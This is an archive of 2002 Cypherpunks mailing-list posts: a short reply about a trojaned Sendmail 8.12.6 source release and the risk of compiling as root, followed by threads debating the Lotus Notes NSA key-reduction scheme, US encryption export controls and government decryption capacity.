Re: Trojan-modified Sendmail floating around - 8.12.6 - Since Sept. 28th or earlier.
On Wed, Oct 09, 2002 at 11:01:21PM +0100, Ben Laurie wrote: Bill Stewart wrote: Somebody backdoored the source code for Sendmail on the official server. So if you recompile from scratch, your sendmail is 0wned. Another reason not to run mail systems as root In this case, as I understand it, it bites when you compile. Running 'configure' has always made me nervous. Its a little difficult to read for exploit code. So, its another reason not to build them as root. But you're _supposed to_ run rpm -b as root!-- someone who should know better since I'd just spent an hour explaining what to look for to see if his install of sendmail had gotten him 0wned. Sigh. Eric
Re: Echelon-like...
I assume everyone knows the little arrangement that lotus reached with the NSA over its encrypted secure email? I'm new here, so do tell if I am wrong. Are you referring to the two levels of Encryption available in Bogus Notes? More or less, yes. Lotus knew nobody would buy a 40 bit version of their crypto, so there is a two-level encryption all right, but not along those lines - in the export version, some of the session key is encrypted using a PKI work reduction factor key in the message header; this section of header is important, as lotus gateways won't accept messages that have had it disturbed. by decoding this block, the NSA have the actual keysize they need to block reduced to the legal export level of 40 bits; one government found this out *after* rolling it out to all their billing and contract negotiation departments... belgum or sweden by memory . Lotus thought it would be ok if only the NSA (and other US government orgs) could break the key, rather than letting everyone have an equal chance (and indeed, letting their customers know their crypto was still only 40 bit vs USA intel agencies) Still, even the domestic version was only 64 bits, which is painfully small even by the standards of the day. certainly, even strong lotus could have been crackable by the NSA, who after all own their own fab plant to make custom VLSI cracking chips.
Re: Echelon-like...
B --Kaos-Keraunos-Kybernetos--- + ^ + :NSA got $20Bil/year |Passwords are like underwear. You don't /|\ \|/ :and didn't stop 9-11|share them, you don't hang them on your/\|/\ --*--:Instead of rewarding|monitor, or under your keyboard, you \/|\/ /|\ :their failures, we |don't email them, or put them on a web \|/ + v + :should get refunds! |site, and you must change them very often. [EMAIL PROTECTED] http://www.sunder.net On 10 Oct 2002, anonimo arancio wrote: This relates to an issue I've wanted to discuss with Cypherpunks for several years. Over the years, I've seen several commentators (including Timothy May) appear suprised when discussing the US's encryption export policies. The basic argument is that, if good encryption is available overseas or easily downloadable, it doesn't make sense to make export of it illegal. Is the above statement a) wrong, b) obvious c) mentioned previously on the cypherpunks boards, or d)hey! We never thought of that
Re: Echelon-like...
I assume everyone knows the little arrangement that lotus reached with the NSA over its encrypted secure email? I'm new here, so do tell if I am wrong. Are you referring to the two levels of Encryption available in Bogus Notes? (ie, the North American and the International, the International being legal for export.) At one of my previous employers, we were told the (apocryphal?) story of some dude who got arrested on an airplane for having the more secure version of Notes on his laptop. From: David Howe [EMAIL PROTECTED] To: Email List: Cypherpunks [EMAIL PROTECTED] Subject: Re: Echelon-like... Date: Thu, 10 Oct 2002 18:38:36 +0100 On Wednesday, October 9, 2002, at 07:28 PM, anonimo arancio wrote: The basic argument is that, if good encryption is available overseas or easily downloadable, it doesn't make sense to make export of it illegal. Nope. The biggest name in software right now is Microsoft, who wasn't willing to face down the government on this. no export version of a Microsoft product had decent crypto while the export regulations were in force - and the situation is pretty poor even now. If microsoft were free to compete in this area (and lotus, of notes fame) then decent security *built into* the operating system, the desktop document suite or the email package - and life would get a lot, lot worse for the spooks. I assume everyone knows the little arrangement that lotus reached with the NSA over its encrypted secure email? _ Join the worlds largest e-mail service with MSN Hotmail. http://www.hotmail.com
Re: Echelon-like...
On Wednesday, October 9, 2002, at 07:28 PM, anonimo arancio wrote: The basic argument is that, if good encryption is available overseas or easily downloadable, it doesn't make sense to make export of it illegal. Nope. The biggest name in software right now is Microsoft, who wasn't willing to face down the government on this. no export version of a Microsoft product had decent crypto while the export regulations were in force - and the situation is pretty poor even now. If microsoft were free to compete in this area (and lotus, of notes fame) then decent security *built into* the operating system, the desktop document suite or the email package - and life would get a lot, lot worse for the spooks. I assume everyone knows the little arrangement that lotus reached with the NSA over its encrypted secure email?
Re: Echelon-like...
On Thu, Oct 10, 2002 at 02:28:26AM -, anonimo arancio wrote: [..] But I am wondering if Cypherpunks have mentioned the 'obvious'. The government knows exactly what it's doing. It wants to discourage the use of encryption by any means necessary, because of sheer numbers. Basically, the more messages that are encypted, the more hardware (and therefore $$$) will be needed to decrypt them. Therefore, the only way they can stay ahead of the game is to keep the numbers as low as possible, so they can continue to outspend the problem. This is, from their perspective, a perfectly reasonable approach to decrypting large numbers of messages, a small fraction of which may contain interesting information. Is the above statement a) wrong, b) obvious c) mentioned previously on the cypherpunks boards, or d)hey! We never thought of that B and C, extensively. The US Government has pretty much given up on restricting crypto exports. There is just enough of a vestigial restriction there to maintain the illusion that the government has a right to control crypto exports. If there was anything more, it would be challenged in court and most likely get thrown out. The government backed off on previous challenges (Bernstein, Zimmerman) to avoid that. Eric
Re: Echelon-like...
Not only is EM correct, but: * many attacks are possible without worrying about keylength. Got Scarfo? * NIST/NSA picked the lamest AES. If I told you what lame meant, I'd have to kill you. * (Lack of) User motivation (related to man-machine issues) is still the spooks' best friend. As well as legacy systems, and inadequately designed total systems. Got Redmond? However, stego and decent opsec and cash and leo buffoonery still let you coordinate the occasional urban skyline reconstruction, poking holes in boats, etc. Got Dead Drops? Mr. Hanssen? Mr Ames? At 08:09 AM 10/10/02 -0700, Eric Murray wrote: On Thu, Oct 10, 2002 at 02:28:26AM -, anonimo arancio wrote: The government knows exactly what it's doing. It wants to discourage the use of encryption by any means necessary, because of sheer numbers. Basically, the more messages that are encypted, the more hardware (and therefore $$$) will be needed to decrypt them. Therefore, the only way they can stay ahead of the game is to keep the numbers as low as possible, so they can continue to outspend the problem. This is, from their perspective, a perfectly reasonable approach to decrypting large numbers of messages, a small fraction of which may contain interesting information. Is the above statement a) wrong, b) obvious c) mentioned previously on the cypherpunks boards, or d)hey! We never thought of that B and C, extensively. The US Government has pretty much given up on restricting crypto exports. There is just enough of a vestigial restriction there to maintain the illusion that the government has a right to control crypto exports. If there was anything more, it would be challenged in court and most likely get thrown out. The government backed off on previous challenges (Bernstein, Zimmerman) to avoid that. Eric
Re: Echelon-like...
hi, The government knows exactly what it's doing. It wants to discourage the use of encryption by any means necessary, because of sheer numbers. Does n't govt intervension always increase the numbers? Basically, the more messages that are encypted, the more hardware (and therefore $$$) will be needed to decrypt them. Therefore, the only way they can stay ahead of the game is to keep the numbers as low as possible, so they can continue to outspend the problem. Why don't we have encrypted spams over the internet rather than plain text spam ?Thats one way we can all benefit frm spam. The US Government has pretty much given up on restricting crypto exports. Why did that happen? Regards Sarath. __ Do you Yahoo!? Faith Hill - Exclusive Performances, Videos More http://faith.yahoo.com